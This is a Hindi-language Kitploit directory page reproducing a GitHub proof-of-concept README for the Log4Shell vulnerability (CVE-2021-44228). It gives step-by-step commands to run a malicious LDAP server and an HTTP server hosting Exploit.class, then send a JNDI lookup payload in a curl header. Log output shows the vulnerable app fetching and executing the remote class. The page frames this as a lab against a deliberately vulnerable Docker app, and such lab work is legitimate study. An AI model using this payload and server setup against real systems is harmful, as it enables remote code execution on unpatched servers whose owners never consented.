Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44228 — CVE-2021-44228 के लिए PoC। | Kitploit
उपकरण/GitHubGitHub/marcourbano/cve-2021-44228
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubmarcourbano/cve-2021-44228

CVE-2021-44228

CVE-2021-44228 के लिए PoC।

रिपॉजिटरी देखें
7713 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4Shell POC (CVE-2021-44228)

इस रिपॉजिटरी का उद्देश्य CVE-2021-44228, जिसे Log4Shell उपनाम दिया गया है, का शोषण करने के लिए आवश्यक सभी घटक प्रदान करना और यह दिखाना है कि इसका शोषण कैसे किया जाए।

इस कमजोरी का शोषण करने के लिए आवश्यक सामग्री निम्नलिखित हैं:

  1. एक LDAP सर्वर जो कमजोर एप्लिकेशन को एक्सप्लॉइट की ओर रीडायरेक्ट करेगा।
  2. एक कमजोर एप्लिकेशन (Spring Boot वेब एप्लिकेशन जो CVE-2021-44228 के प्रति संवेदनशील है) जो Log4J के कमजोर संस्करण का उपयोग कर रहा है।
  3. Java Exploit.class (और संबंधित Exploit.java फ़ाइल) जो कमजोर एप्लिकेशन द्वारा लोड किया जाएगा।
  4. एक http सर्वर जहाँ से कमजोर एप्लिकेशन दुर्भावनापूर्ण Exploit.class डाउनलोड करेगा।

श्रेय:

  • LDAP सर्वर को mbechler के Marshalsec रिपॉजिटरी से लिया गया है।
  • कमजोर एप्लिकेशन christophetd द्वारा प्रदान किया गया है।

पूर्वापेक्षाएँ:

  • Maven
  • Java
  • Docker
  • Python

LDAP सर्वर और HTTP सर्वर चलाना

HTTP सर्वर

1. exploit फ़ोल्डर में जाएँ और Python के माध्यम से http सर्वर शुरू करें।

root@kitploit:~
python3 -m http.server PORT

LDAP सर्वर

1. ldap_server फ़ोल्डर में जाएँ और pom.xml बनाएँ।

root@kitploit:~
mvn clean package -DskipTests

2. target फ़ोल्डर में जाएँ और http_server_ip तथा http_server_port निर्दिष्ट करके सर्वर शुरू करें।

root@kitploit:~
java -cp ldap_server-1.0-all.jar marshalsec.jndi.LDAPRefServer "http://http_server_ip:http_server_port/#Exploit"

नोट: यह कमांड दुर्भावनापूर्ण ldap सर्वर को प्रत्येक ldap क्वेरी पर Exploit.class URI के साथ उत्तर देने के लिए बाध्य करके चलाता है।

कमजोर एप्लिकेशन चलाना

Docker कमजोर एप्लिकेशन कंटेनर चलाएँ।

root@kitploit:~
docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

नोट: डिफ़ॉल्ट रूप से हम कमजोर एप्लिकेशन को पोर्ट 8080 पर चला रहे हैं, इसे बदलने के लिए स्वतंत्र महसूस करें।

शोषण (Exploitation)

एक बार vulnerable_application, ldap_server और http_server चल रहे हों, तो कमजोर सर्वर पर एक दुर्भावनापूर्ण HTTP अनुरोध भेजें।

root@kitploit:~
curl VULNERABLE_APPLICATION_IP:8080 -H 'X-Api-Version: ${jndi:ldap://ldap_server_ip:1389/a}'

vulnerable_application पेलोड को लॉग करेगा और एक ldap क्वेरी करेगा।

root@kitploit:~
2021-12-24 18:48:14.644  INFO 1 --- [nio-8080-exec-1] HelloWorld: Received a request for API version ${jndi:ldap://10.0.2.15:1389/a}

ldap_server Exploit.class URI के साथ उत्तर देगा।

root@kitploit:~
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://10.0.2.15:8443/Exploit.class

http_server को Exploit.class का अनुरोध प्राप्त होगा।

root@kitploit:~
Serving HTTP on 0.0.0.0 port 8443 (http://0.0.0.0:8443/) ...
172.17.0.2 - - [24/Dec/2021 19:48:14] "GET /Exploit.class HTTP/1.1" 200 -

अंत में, हम जाँच सकते हैं कि एक्सप्लॉइट ने पीड़ित फ़ाइलसिस्टम पर एक नई फ़ाइल बनाई है। इस उदाहरण में हमें Docker कंटेनर फ़ाइलसिस्टम की जाँच करने की आवश्यकता है।

संदर्भ

https://www.lunasec.io/docs/blog/log4j-zero-day/
https://github.com/mbechler/marshalsec
https://github.com/christophetd/log4shell-vulnerable-app

योगदानकर्ता

@CrashOverflow

टूल डाउनलोड करें